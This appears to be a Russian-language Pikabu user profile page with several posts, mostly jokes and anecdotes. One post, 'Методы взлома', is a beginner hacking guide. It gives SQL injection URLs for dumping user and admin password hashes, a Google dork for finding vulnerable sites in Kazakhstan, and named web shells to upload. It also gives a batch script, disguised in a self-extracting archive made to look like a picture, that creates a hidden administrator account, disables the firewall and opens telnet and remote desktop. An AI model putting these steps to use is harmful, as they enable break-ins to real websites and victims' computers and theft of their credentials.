SashaMelnikova

SashaMelnikova

Пикабушница
7003 рейтинг 87 подписчиков 3 подписки 81 пост 7 в горячем
Награды:
10 лет на Пикабу

Про пикабу и школьников

Ох, уж что-то много постов стало о том, что на пикабу сидят одни школьники! Так вот мне захотелось проверить так ли это!
Давайте так, каждый школьник ставит минус, а остальные плюс =) Мне просто действительно интересно, правда ли это..

Методы взлома

Методы взлома
[ Хакерство для новичков ]

Здравствуйте.
Сейчас я расскажу о приемах взлома серверов, компьютеров, mail адресов.
Методы взлома сервера:
SQL – injection
Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
Атака типа внедрения SQL может быть возможна из-за некорректной обработки входящих данных, используемых в SQL-запросах.

Пример

$id = $_REQUEST['id'];
$res = mysql_query("SELECT * FROM news WHERE id_news = $id");

http://example.org/script.php?id=5

ставим кавычку

http://example.org/script.php?id=5

Если она не фильтруется то выйдет ошибка:

(Warning: mysql(): supplied argument is not a valid MySQL result resource in)

Далее идет вычисление полей в таблице с помощью параметра ORDER BY

http://example.org/script.php?id=5+ORDER+BY+ предполагаемое количество полей --

Предположим полей 7 из них 3 выводятся на сайте.

http://example.org/script.php?id=-5+ORDER+BY+1,2,3,4,5,6,7--

Выводятся поля 3, 5. Узнаем версию базы MySQL с помощью version()

http://example.org/script.php?id=-5+ORDER+...sion(),4,5,6,7—

На сайте в 3м поле будет написана версия базы. Предположим это 5 версия.

Во всех версиях выше 4 ой есть универсальные таблицы INFORMATION_SCHEMA.TABLES и поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME


http://example.org/script.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—

Теперь в 3м поле выдут все таблицы которые находятся в базе.

http://example.org/script.php?id=-5+ORDER+...SCHEMA.COLUMNS—

Все колонки находящиеся в таблицах.

Далее находим таблицу например users и поле например user_name, user_pass, user_email, user_mobile, user_address

Составляем запрос

http://example.org/script.php?id=-5+ORDER+...6,7+FROM+users—

И в 3м поле выходит полная информация о пользователе. Параметр user_pass то есть пароль пользователя выйдет в зашифрованном виде (алгаритм md5 чаще всего) 446f9bce9cd9e51771f60b6e9a12108b после расшифровки пароль примет следующий вид предположим 123923993838.
Остальные поля понятны.
То же самое и с таблицей admin, только пароль после расшифровки можно использовать для авторизации к сайту как администратор. Чаще всего админки сайтов лежат по адресу http://example.org/admin/ или /administrator/

Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл.( спец php скрипт дающий полный доступ к серверу и хостингу в общем, тое есть если на сервере находиться не один сайт а 50 – 100 то с его помощью можно получить доступ к редактированию всех сайтов и управлении операционной системы сервера) на пример r57shell или c99madshell.

Найти подобную уязвимость на сайтах не трудно нужно всего лишь ввести в google.com
запрос: inurl:news.php?id=5 site:kz Warning: mysql

По запросу выйдет очень много уязвимых сайтов находящихся в Казахстане.

Взлом компьютера.
Есть очень много способов, но я расскажу об универсальном, с его помощью можно будет получить полный доступ к компьютеру вплоть до подключения к рабочему столу.

Для начала создается спец файл и который маскируется под архив и и методом соц. Инженерии “впаривается” через любой доступный метод на компьютер “жертвы”
После того как архив закачен на компьютер и открыт запускается BAT файл который открывает доступ к компьютеру через telnet. Зная IP адрес уязвимой машины можно проникнуть в него и скачать любой файл. При этом вирусная опасность будет нулевая!
Пример
.bat файл

chcp 1251
net user coolz 12333 /add
net localgroup Администраторы coolz /add
net localgroup Administrators coolz /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

Создается отдельный пользователь в системе coolz и задается пароль 12333
Далее присваиваются права администратора. И открывается порт 972.

За тем выбираешь файл который нужно “впарить” пусть это будет картинка 1.jpg

Выбирается картинка и пакуется в sfx архив, далее выделяете картинку (1.exe в архиве) и “батник” (1.bat)
нажимаешь добавить в архив. Ставишь галку создать SFX архив потом нажимаешь во вкладку дополнительно и выбираешь пара
метры SFX
Путь для распаковки пишешь: %WinDir%temp
В окошке выполнять после распаковки
пишем наш архив с картинкой. 1.exe
Заводим во вкладку режимы выбираем скрыть все нажимаем ок
Теперь заходим во вкладку комментарий
И где написано ввести комментарий вручную После строчки SavePath добавляем Setup=cool.bat
Внешний вид

Path=%WinDir%temp
SavePath
Setup=cool.bat
Setup=1.exe
Silent=1

Нажимаем ОК

Все замаскированный архив с батником готов

То есть после того как открывается архив выполняется бат файл за тем открывается картинка

После подключения к компьютеру можно открыть доступ к удаленному управлению
Для этого в командной строке вводятся следующие параметры
chcp 1251
net localgroup Пользователи удаленного рабочего стола coolz /add
net accounts /maxpwage:unlimited
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "coolz" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
sc config tlntsvr start= auto

Все доступ открыт. Подключаемся к компьютеру с помощью Подключение к удаленному рабочему столу.
Водим логин пароль и всё. Загружается рабочий стол уязвимой машины. В дальнейшем можно загрузить сниффер и узнать все пароли. (ICQ, mail адрес и. т. д.)


О взломе ящика скажу коротко.
Есть 3 способа взлома:
1й перебор пароля по словарю
2й использование XSS уязвимости
3й соц.инженерия
Показать полностью

о Пикабу

Все уже давно запомнили, что ghbdtn - это привет.
А я, например, уже запомнила, что gbrf,e -это Пикабу так как постоянно первым делом набираю это в поисковике =)
Всем добра =)
13

Жизненные истории

Стояли с дочкой на вокзале, ждали электричку. Дочке тогда было 6 лет.

Рядом с нами скучал поп. Классический батюшка: 2 метра ростом, 3 метра в обхвате, седая борода до груди и огромный крест на шее.

Ребенок мой, открыв рот, внимательно рассматривала невиданное доселе чудо.Обошла пару раз кругом, почесала в затылке.

Батюшка взирал на эти эволюции с олимпийским спокойствием. Потом дочка подошла ко мне и спросила:

" Папа! А почему у Деда Мороза одежда черная? Снегурочка померла?"

Мы с батюшкой дружно упали на скамейку и ржали до приезда электрички.

Потом он купил дочке шоколадку и благословил.

________________________________________

Путешествую по Европе поездом и автобусом. Над головой обязательно красная кнопка с чашкой кофе. Нажимаю. Симпатичная проводница тут же приносит капучино.
Попал в больницу. Рядом с кроватью красная кнопка. Нажимаю.
Симпатичная медсестра тут же приносит чашку кофе.
Через год лечу домой Люфтганзой. Снова красная кнопка.
Симпатичная стюардесса тут же приносит кофе...

Автобус Мерседес из Домодедово. Красная кнопка с чашкой кофе.
- Кого х.. жмёшь? По хлелу давно не огрел?
- Бляяя! Я дома!

__________________________________________
Частный сектор, естественно домики без удобств, т. е. туалет на улице и зимой там случаются метаморфозы в виде сталагмита ну который растет снизу по мере намерзания г@мна. Так вот местный абориген по оттепели отломал эту сосульку запихал в мешок, на санки и повез подальше выбросить.

Рядом с поселком находится жд.перегон, сортировка и тд., там частенько промышляют воришки в виде бомжей, цыган, прочего сброда, в общем везет он саночки вдруг сзади крякает милицейская сирена, громкоговоритель приказывает остановится, абориген бросает санки делает Ноги, к поклаже подлетает мил. Бобик, менты резво грузят мешок в машину разворачиваются и также резво испаряются. Интересно как добычу делили?

_________________________________________

Собралась компания мужиков на охоту, а один из них главный хирург областного масштаба поехать не смог (ну что-то там по работе случилось).
Короче сидит он в ординаторской вдруг звонок (звонит один из друзей-охотников, тоже хирург):
- Привет Вася, у нас тут проблема серьезная. Случайно двух орлов местных подстрелили, кровью истекают. Я им повязки наложил , в общем, через 3 часа будем у тебя - выручай, дело то уголовное....
Хирург напрягся, медперсонал на уши, операционную готовят, ждут.
Наконец друзья приезжают, и вываливают ему в приемном покое 2 огромных мешка со словами - "пострадавшие тут!".
У хирурга глаза на лоб,и мысли нехорошие в голове - "раненых в мешках привезли!!! Что-то совсем темное дело!"
Заглянул в мешок, а там и правда настоящий большой орел (название не знаю) сидит. Хирург забился в истерике и упал на пол.

Но это еще не все, в это время медсестра готовит операционную,а хирург ей звонит и говорит что мол рана ерунда и операцию проведут в малой операционной.
Отнесли этих беркутов туда, один пока в мешке сидит а другого на стол и зашивать ему крыло (там что-то перебито было).
Друг держит у орла крылья вверх чтоб легче лечить было, в это время входит запыхавшаяся медсестра со словами - "А какая группа крови у пациента....." и с круглыми глазами теряет сознание.
Оказалось, что когда хирург к ней повернулся, у него за спиной в этот момент распахнулись огромные крылья. Женский мозг этого не выдержал.

Окончилась история без жертв, орлов выходили, медсестру в чувства привели.

_____________________________________________

Один мой товарищ, доктор наук и профессор, между прочим, застал раз свою юную дочь (одиннадцати годов на то время) за разглядыванием двух бабочек моли, слившихся в экстазе на дверце холодильника.

– Смотри, папа, какая странная сросшаяся моль, – задумчиво произнесла дочь.

– Это не сросшаяся моль, а две отдельные, – поправил папа.

– Тогда что они тут делают? – поинтересовалось дитя.

– Занимаются смехом, – честно ответил папа, который всегда считал, что честность и открытость – главное в отношениях между детьми и родителями.

Но следующий вопрос дотошного ребенка даже папу-профессора надолго вогнал в ступор.

– А почему ТАК ТИХО?

Как сказал товарищ, он не знал, то ли ржать, то ли плакать, то ли гордиться собой…

__________________________________________________

Подруга завтра выходит замуж за сантехника! А впрочем, все по порядку.

Подруга – интеллигентное создание 25 лет, преуспевающий менеджер в крупной компании, живет одна, снимает квартиру. Дальше с ее слов.

«В туалете перестал работать сливной бачок. Не спускает воду, и все. Нахожу номер ЖКС, вызываю сантехника. Сказали, что он придет через час. Думаю, как с ним расплачиваться... Ну не денег же давать! Сходила за бутылкой водки, все так делают.

Звонок в дверь. Открываю, на пороге. Очень прилично выглядящий молодой человек с чемоданчиком. Говорю: «Проходите, снимайте курточку» Показала, где туалет, объяснила, что сломалось. Пока чинил, очень душевненько пообщались. Бутылку не взял, но напросился через пару дней на чай.

Пришел на чай, с тортиком, такой милый, я так пожалела, что у него профессия такая… Неподходящая...»

Рассказ от лица молодого человека: «Договорились с моим старым приятелем, что зайду в гости. Давно у него был, квартиру толком не помню. Звоню, дверь открывает милая девушка. Ну, думаю, женился, а мне и слова не сказал. Девушка вешает мою курточку, я пытаюсь снять ботинки, а она говорит: «Не надо, я вам газетку постелю!»

Стою... Осмысливаю... Зачем и куда стелить газетку? Следующая фраза девушки повергает меня в окончательный шок: «Вот, туалет здесь, проходите». Стою, балдею... И тут она сказала про сломавшийся бачок! Понял! Меня приняли за сантехника... Мдааа... Хорошо выгляжу, наверно... Починил девушке бачок. Напросился на чай».

Завершение истории от лица подруги: «И тут он спрашивает, ехидненько так: «А что, сантехник так и не пришел?» Немой вопрос в моих глазах! Он: «Да я вообще-то юрист по профессии... Просто Вы были так настойчивы...»

Поженились-таки, спустя 4 месяца.
Показать полностью
Отличная работа, все прочитано!

Темы

Политика

Теги

Популярные авторы

Сообщества

18+

Теги

Популярные авторы

Сообщества

Игры

Теги

Популярные авторы

Сообщества

Юмор

Теги

Популярные авторы

Сообщества

Отношения

Теги

Популярные авторы

Сообщества

Здоровье

Теги

Популярные авторы

Сообщества

Путешествия

Теги

Популярные авторы

Сообщества

Спорт

Теги

Популярные авторы

Сообщества

Хобби

Теги

Популярные авторы

Сообщества

Сервис

Теги

Популярные авторы

Сообщества

Природа

Теги

Популярные авторы

Сообщества

Бизнес

Теги

Популярные авторы

Сообщества

Транспорт

Теги

Популярные авторы

Сообщества

Общение

Теги

Популярные авторы

Сообщества

Юриспруденция

Теги

Популярные авторы

Сообщества

Наука

Теги

Популярные авторы

Сообщества

IT

Теги

Популярные авторы

Сообщества

Животные

Теги

Популярные авторы

Сообщества

Кино и сериалы

Теги

Популярные авторы

Сообщества

Экономика

Теги

Популярные авторы

Сообщества

Кулинария

Теги

Популярные авторы

Сообщества

История

Теги

Популярные авторы

Сообщества